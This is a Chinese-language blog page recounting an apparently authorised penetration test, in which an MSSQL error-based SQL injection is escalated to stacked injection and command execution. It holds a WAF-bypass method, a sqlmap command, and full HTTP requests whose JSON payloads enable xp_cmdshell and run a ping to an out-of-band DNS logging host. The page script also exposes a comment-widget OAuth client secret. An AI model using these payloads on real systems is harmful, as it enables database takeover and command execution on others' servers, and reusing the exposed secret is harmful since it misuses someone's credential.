<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="从MSSQL报错注入到堆叠注入，实现命令执行0x01-前言近日对一已授权的站点进行渗透测试，随手一个单引号，发现存在SQL报错信息。  0x02-报错注入尝试报错注入，发现系统存在两层防御，一个是云WAF，一个代码防御。开始使用分块传输绕过云WAF（使用的是Burpsuite插件：chunked-coding-converter-0.4.0），确实可以绕过。但后面使用 select 语句的时候，被">
<meta property="og:type" content="article">
<meta property="og:title" content="从MSSQL报错注入到堆叠注入，实现命令执行">
<meta property="og:url" content="http://example.com/2022/04/07/%E4%BB%8EMSSQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%88%B0%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%AE%9E%E7%8E%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/index.html">
<meta property="og:site_name" content="sing&#39;s Blog">
<meta property="og:description" content="从MSSQL报错注入到堆叠注入，实现命令执行0x01-前言近日对一已授权的站点进行渗透测试，随手一个单引号，发现存在SQL报错信息。  0x02-报错注入尝试报错注入，发现系统存在两层防御，一个是云WAF，一个代码防御。开始使用分块传输绕过云WAF（使用的是Burpsuite插件：chunked-coding-converter-0.4.0），确实可以绕过。但后面使用 select 语句的时候，被">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage1.png">
<meta property="og:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage2.png">
<meta property="og:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage3.png">
<meta property="og:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage4.png">
<meta property="og:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage20220407203229.png">
<meta property="article:published_time" content="2022-04-07T12:44:36.000Z">
<meta property="article:modified_time" content="2022-04-07T14:25:26.438Z">
<meta property="article:author" content="sing">
<meta property="article:tag" content="MSSQL">
<meta property="article:tag" content="sql server">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontents.com/sing3r/image/main/hexoImage1.png">

<link rel="canonical" href="http://example.com/2022/04/07/%E4%BB%8EMSSQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%88%B0%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%AE%9E%E7%8E%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>从MSSQL报错注入到堆叠注入，实现命令执行 | sing's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">sing's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-首页">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-标签">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-归档">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/04/07/%E4%BB%8EMSSQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%88%B0%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%AE%9E%E7%8E%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sing">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sing's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          从MSSQL报错注入到堆叠注入，实现命令执行
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-04-07 20:44:36 / Modified: 22:25:26" itemprop="dateCreated datePublished" datetime="2022-04-07T20:44:36+08:00">2022-04-07</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQLi/" itemprop="url" rel="index"><span itemprop="name">SQLi</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="从MSSQL报错注入到堆叠注入，实现命令执行"><a href="#从MSSQL报错注入到堆叠注入，实现命令执行" class="headerlink" title="从MSSQL报错注入到堆叠注入，实现命令执行"></a>从MSSQL报错注入到堆叠注入，实现命令执行</h1><h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01-前言"></a>0x01-前言</h2><p>近日对一已授权的站点进行渗透测试，随手一个单引号，发现存在SQL报错信息。</p>
<p><img src="https://raw.githubusercontents.com/sing3r/image/main/hexoImage1.png" alt="图一"></p>
<h2 id="0x02-报错注入"><a href="#0x02-报错注入" class="headerlink" title="0x02-报错注入"></a>0x02-报错注入</h2><p>尝试报错注入，发现系统存在两层防御，一个是云WAF，一个代码防御。开始使用分块传输绕过云WAF（使用的是Burpsuite插件：<code>chunked-coding-converter-0.4.0</code>），确实可以绕过。但后面使用 <code>select</code> 语句的时候，被后端代码拦截了，提示非法访问。后续修改 POST 数据 <code>Content-Type</code> 为 JSON 格式后，直接绕过云 WAF 以及后端代码两层防御。具体绕过测试结果如下图。</p>
<p><img src="https://raw.githubusercontents.com/sing3r/image/main/hexoImage2.png" alt="图二"></p>
<p>根据已知信息，使用 SQLMAP 根据进行数据提取。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="operator">-</span>r sql.txt <span class="comment">--level 5 --risk 2 --batch --dbms=&quot;Microsoft SQL Server&quot; --technique=E --prefix=&quot;)&quot; --dbs</span></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontents.com/sing3r/image/main/hexoImage3.png" alt="图三"></p>
<h2 id="0x03-升级为堆叠注入"><a href="#0x03-升级为堆叠注入" class="headerlink" title="0x03-升级为堆叠注入"></a>0x03-升级为堆叠注入</h2><p>猜想该注入点支持堆叠注入。但直接使用 <code>1);select 1</code> ，服务器是报错的。所以必须知道原始的查询语句才可以正确闭合。</p>
<h3 id="查询正在执行的语句"><a href="#查询正在执行的语句" class="headerlink" title="查询正在执行的语句"></a>查询正在执行的语句</h3><p>每个数据库就有一个默认表存储着正在执行的SQL语句，MYSQL 正在执行查询的SQL语句为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> information_schema.`PROCESSLIST` <span class="keyword">where</span> info <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span>;</span><br></pre></td></tr></table></figure>

<p>MSSQL 为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span></span><br><span class="line">der.[session_id],der.[blocking_session_id],</span><br><span class="line">sp.lastwaittype,sp.hostname,sp.program_name,sp.loginame,</span><br><span class="line">der.[start_time] <span class="keyword">AS</span> <span class="string">&#x27;开始时间&#x27;</span>,</span><br><span class="line">der.[status] <span class="keyword">AS</span> <span class="string">&#x27;状态&#x27;</span>,</span><br><span class="line">dest.[text] <span class="keyword">AS</span> <span class="string">&#x27;sql语句&#x27;</span>,</span><br><span class="line">DB_NAME(der.[database_id]) <span class="keyword">AS</span> <span class="string">&#x27;数据库名&#x27;</span>,</span><br><span class="line">der.[wait_type] <span class="keyword">AS</span> <span class="string">&#x27;等待资源类型&#x27;</span>,</span><br><span class="line">der.[wait_time] <span class="keyword">AS</span> <span class="string">&#x27;等待时间&#x27;</span>,</span><br><span class="line">der.[wait_resource] <span class="keyword">AS</span> <span class="string">&#x27;等待的资源&#x27;</span>,</span><br><span class="line">der.[logical_reads] <span class="keyword">AS</span> <span class="string">&#x27;逻辑读次数&#x27;</span></span><br><span class="line"><span class="keyword">FROM</span> sys.[dm_exec_requests] <span class="keyword">AS</span> der</span><br><span class="line"><span class="keyword">INNER</span> <span class="keyword">JOIN</span> master.dbo.sysprocesses <span class="keyword">AS</span> sp <span class="keyword">ON</span> der.session_id<span class="operator">=</span>sp.spid</span><br><span class="line"><span class="keyword">CROSS</span> APPLY  sys.[dm_exec_sql_text](der.[sql_handle]) <span class="keyword">AS</span> dest</span><br><span class="line"><span class="comment">--WHERE [session_id]&gt;50 AND session_id&lt;&gt;@@SPID</span></span><br><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span> der.[session_id]</span><br><span class="line">GO</span><br></pre></td></tr></table></figure>

<p>简化后为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> TOP <span class="number">1</span> dest.[text] <span class="keyword">AS</span> <span class="string">&#x27;sql&#x27;</span> <span class="keyword">FROM</span> sys.[dm_exec_requests] <span class="keyword">AS</span> der <span class="keyword">INNER</span> <span class="keyword">JOIN</span> master.dbo.sysprocesses <span class="keyword">AS</span> sp <span class="keyword">ON</span> der.session_id<span class="operator">=</span>sp.spid <span class="keyword">CROSS</span> APPLY  sys.[dm_exec_sql_text](der.[sql_handle]) <span class="keyword">AS</span> dest <span class="keyword">ORDER</span> <span class="keyword">BY</span> der.[session_id])</span><br></pre></td></tr></table></figure>

<p>正在执行的SQL语句原型，如下图所示：</p>
<p><img src="https://raw.githubusercontents.com/sing3r/image/main/hexoImage4.png" alt="图四"></p>
<blockquote>
<p>By the way：关于获取 SQL 原始语句将 <strong>“布尔盲注”</strong> 升级为 <strong>“UNION 注入”</strong> 的更多内容详见下文：<a target="_blank" rel="noopener" href="https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f">https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f</a></p>
</blockquote>
<p>闭合原始sql语句，进行堆叠注入：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"># 开启 xp_cmdshell</span><br><span class="line"></span><br><span class="line"><span class="keyword">POST</span> <span class="string">/马赛克</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>马赛克:8082</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>128</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">X-Requested-With</span><span class="punctuation">: </span>XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://马赛克:8082</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://马赛克:8082/</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>马赛克</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json;charset=UTF-8</span><br><span class="line"></span><br><span class="line"><span class="language-haxe">&#123;<span class="string">&quot;ids&quot;</span>:<span class="type"></span>&quot;<span class="number">111</span>);EXEC sp_configure <span class="string">&#x27;show advanced options&#x27;</span>, <span class="number">1</span>;RECONFIGURE;EXEC sp_configure <span class="string">&#x27;xp_cmdshell&#x27;</span>, <span class="number">1</span>;RECONFIGURE;SELECT 马赛克 FROM dbo.马赛克 WHERE x IN (<span class="number">111</span><span class="string">&quot;&#125;</span></span></span><br></pre></td></tr></table></figure>

<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"># 执行 ping 命令</span><br><span class="line"></span><br><span class="line"><span class="keyword">POST</span> <span class="string">/马赛克</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>马赛克:8082</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>128</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">X-Requested-With</span><span class="punctuation">: </span>XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://马赛克:8082</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://马赛克:8082/</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>马赛克</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json;charset=UTF-8</span><br><span class="line"></span><br><span class="line"><span class="language-n1ql">&#123;&quot;ids&quot;:&quot;111);exec master..xp_cmdshell &#x27;ping bf5af7e2005beb3706534f7b0ab4.ns.pingb.in&#x27;;<span class="keyword">SELECT</span> 马赛克 <span class="keyword">FROM</span> dbo.马赛克 <span class="keyword">WHERE</span> x <span class="keyword">IN</span> (<span class="number">111</span><span class="string">&quot;&#125;</span></span></span><br></pre></td></tr></table></figure>
<p>执行结果：</p>
<p><img src="https://raw.githubusercontents.com/sing3r/image/main/hexoImage20220407203229.png" alt="图五"></p>
<h1 id="0x04-其他"><a href="#0x04-其他" class="headerlink" title="0x04-其他"></a>0x04-其他</h1><p><strong>查询执行过的 sql 语句</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 来自 https://www.cnblogs.com/blogcore/p/12467024.html</span></span><br><span class="line"><span class="keyword">SELECT</span> TOP <span class="number">1000</span> </span><br><span class="line">       ST.text <span class="keyword">AS</span> <span class="string">&#x27;执行的SQL语句&#x27;</span>,</span><br><span class="line">       QS.execution_count <span class="keyword">AS</span> <span class="string">&#x27;执行次数&#x27;</span>,</span><br><span class="line">       QS.total_elapsed_time <span class="keyword">AS</span> <span class="string">&#x27;耗时&#x27;</span>,</span><br><span class="line">       QS.total_logical_reads <span class="keyword">AS</span> <span class="string">&#x27;逻辑读取次数&#x27;</span>,</span><br><span class="line">       QS.total_logical_writes <span class="keyword">AS</span> <span class="string">&#x27;逻辑写入次数&#x27;</span>,</span><br><span class="line">       QS.total_physical_reads <span class="keyword">AS</span> <span class="string">&#x27;物理读取次数&#x27;</span>,       </span><br><span class="line">       QS.creation_time <span class="keyword">AS</span> <span class="string">&#x27;执行时间&#x27;</span> ,  </span><br><span class="line">       QS.<span class="operator">*</span></span><br><span class="line"><span class="keyword">FROM</span>   sys.dm_exec_query_stats QS</span><br><span class="line">       <span class="keyword">CROSS</span> APPLY </span><br><span class="line">sys.dm_exec_sql_text(QS.sql_handle) ST</span><br><span class="line"><span class="keyword">WHERE</span>  QS.creation_time <span class="keyword">BETWEEN</span> <span class="string">&#x27;2015-08-01 00:00:00&#x27;</span> <span class="keyword">AND</span> <span class="string">&#x27;2015-09-02 11:00:00&#x27;</span> </span><br><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span></span><br><span class="line">     QS.total_elapsed_time <span class="keyword">DESC</span></span><br></pre></td></tr></table></figure>

<p><strong>简化：去重 + 只取一个结果</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">distinct</span> TOP <span class="number">1</span> <span class="keyword">SQL</span> <span class="keyword">FROM</span> (<span class="keyword">SELECT</span> ST.text <span class="keyword">AS</span> <span class="string">&#x27;SQL&#x27;</span> <span class="keyword">FROM</span> sys.dm_exec_query_stats QS <span class="keyword">CROSS</span> APPLY sys.dm_exec_sql_text(QS.sql_handle) ST) A <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="keyword">SQL</span> <span class="keyword">DESC</span></span><br></pre></td></tr></table></figure>










    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/MSSQL/" rel="tag"># MSSQL</a>
              <a href="/tags/sql-server/" rel="tag"># sql server</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/29/XXE%E6%BC%8F%E6%B4%9E%E7%9F%A5%E8%AF%86/" rel="prev" title="XXE漏洞知识">
      <i class="fa fa-chevron-left"></i> XXE漏洞知识
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/04/13/Unicode-%E7%9B%B8%E5%85%B3%E6%BC%8F%E6%B4%9E%E5%8F%8A%E5%88%A9%E7%94%A8/" rel="next" title="Unicode 相关漏洞及利用">
      Unicode 相关漏洞及利用 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%8EMSSQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%88%B0%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8C%E5%AE%9E%E7%8E%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">1.</span> <span class="nav-text">从MSSQL报错注入到堆叠注入，实现命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">0x01-前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.</span> <span class="nav-text">0x02-报错注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E5%8D%87%E7%BA%A7%E4%B8%BA%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">1.3.</span> <span class="nav-text">0x03-升级为堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%AD%A3%E5%9C%A8%E6%89%A7%E8%A1%8C%E7%9A%84%E8%AF%AD%E5%8F%A5"><span class="nav-number">1.3.1.</span> <span class="nav-text">查询正在执行的语句</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-%E5%85%B6%E4%BB%96"><span class="nav-number">2.</span> <span class="nav-text">0x04-其他</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">sing</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">35</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sing</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '6e8bfc081de57f042466',
      clientSecret: '9b93268b65af7c8c4e8af7a5a1a539f01671b723',
      repo        : 'sing3r.github.io',
      owner       : 'sing3r',
      admin       : ['sing3r'],
      id          : 'd373c9f3dd1dab70b0de4795d99e460b',
        language: '',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
